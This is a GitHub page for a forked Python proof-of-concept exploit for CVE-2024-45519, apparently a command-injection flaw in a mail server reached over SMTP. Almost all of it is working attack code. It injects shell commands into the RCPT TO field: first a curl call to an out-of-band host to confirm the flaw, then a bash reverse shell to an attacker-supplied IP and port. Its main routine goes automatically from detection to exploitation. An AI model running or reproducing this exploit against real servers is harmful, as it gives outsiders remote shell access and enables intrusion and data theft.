forked from cleverg0d/CVE-2024-45519
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathCVE-2024-45519-Poc.py
88 lines (66 loc) · 2.8 KB
/
CVE-2024-45519-Poc.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
import socket
def is_port_open(host, port):
try:
sock = socket.create_connection((host, port), timeout=10)
sock.close()
return True
except (socket.timeout, ConnectionRefusedError, OSError):
return False
def smtp_payload_check_vulnerability(host, port, oast):
try:
with socket.create_connection((host, port), timeout=10) as conn:
conn.send(b'EHLO localhost\r\n')
conn.recv(1024)
conn.send(b'MAIL FROM: <[email protected]>\r\n')
conn.recv(1024)
rcpt_to_payload = f'RCPT TO: <"aabbb$(curl${{IFS}}{oast})"@mail.domain.com>\r\n'.encode()
conn.send(rcpt_to_payload)
conn.recv(1024)
conn.send(b'DATA\r\n')
conn.recv(1024)
conn.send(b'aaa\r\n.\r\n')
resp = conn.recv(1024)
conn.send(b'QUIT\r\n')
return resp.decode('utf-8')
except Exception as e:
return f"Error: {str(e)}"
def smtp_payload_exploit_reverse_shell(host, port, local_ip, local_port):
reverse_shell = f'/bin/bash -i >& /dev/tcp/{local_ip}/{local_port} 0>&1'
try:
with socket.create_connection((host, port), timeout=10) as conn:
conn.send(b'EHLO localhost\r\n')
conn.recv(1024)
conn.send(b'MAIL FROM: <[email protected]>\r\n')
conn.recv(1024)
rcpt_to_payload = f'RCPT TO: <"exploit$(bash -c \'{reverse_shell}\')"@mail.domain.com>\r\n'.encode()
conn.send(rcpt_to_payload)
conn.recv(1024)
conn.send(b'DATA\r\n')
conn.recv(1024)
conn.send(b'Exploit in action\r\n.\r\n')
resp = conn.recv(1024)
conn.send(b'QUIT\r\n')
return resp.decode('utf-8')
except Exception as e:
return f"Error: {str(e)}"
def main():
host = "target.domain.com"
port = 25
oast = "http://your-oast-url.com"
local_ip = "your-local-ip"
local_port = 4444
if is_port_open(host, port):
print(f"Port {port} is open on {host}")
print("Checking for vulnerability...")
response = smtp_payload_check_vulnerability(host, port, oast)
print("SMTP Response (Vulnerability Check):\n", response)
if "message delivered" in response:
print("Vulnerability detected! Proceeding to exploitation...")
exploit_response = smtp_payload_exploit_reverse_shell(host, port, local_ip, local_port)
print("SMTP Response (Exploitation - Reverse Shell):\n", exploit_response)
else:
print("No vulnerability detected or unable to exploit.")
else:
print(f"Port {port} is closed on {host}")
if __name__ == "__main__":
main()